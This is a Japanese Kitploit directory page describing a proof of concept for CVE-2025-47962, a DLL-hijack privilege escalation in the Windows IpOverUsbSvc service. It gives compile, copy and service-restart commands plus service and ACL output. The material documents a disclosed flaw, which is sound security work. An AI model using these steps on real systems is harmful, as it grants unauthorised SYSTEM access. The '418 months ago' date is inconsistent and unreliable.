Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-47962-POC — CVE-2025-47962の概念実証。Windows IpOverUsbSvcサービスにおける安全でないディレクトリ権限を悪用したDLLハイジャックによるローカル特権昇格を示す。 | Kitploit
ツール/GitHubGitHub/q1uf3ng/cve-2025-47962-poc
特権昇格脆弱性分析エクスプロイト横移動バイナリエクスプロイト
GitHubq1uf3ng/cve-2025-47962-poc

CVE-2025-47962-POC

CVE-2025-47962の概念実証。Windows IpOverUsbSvcサービスにおける安全でないディレクトリ権限を悪用したDLLハイジャックによるローカル特権昇格を示す。

リポジトリを見る
418ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-47962-POC

再現手順: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32

copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"

net stop IpOverUsbSvc net start IpOverUsbSvc 画像

説明: IpOverUsbSvc

root@kitploit:~
sc.exe qc IpOverUsbSvc

SERVICE_NAME: IpOverUsbSvc
TYPE               : 10  WIN32_OWN_PROCESS
START_TYPE         : 2   AUTO_START
BINARY_PATH_NAME   : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem

LocalSystem 権限で実行されます。実行可能ファイルは C:\Microsoft Shared\ ディレクトリにあり、標準ユーザーはこのディレクトリに対してフルコントロール権限を持っています。 通常のユーザーが SYSTEM サービスディレクトリにファイルを書き込めることが判明しました。 次に DLL を監視します 画像 画像 画像

Windows SDK インストール時に作成される C:\Microsoft Shared\ ディレクトリのアクセス許可が適切に構成されていません:

root@kitploit:~
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
ツールをダウンロード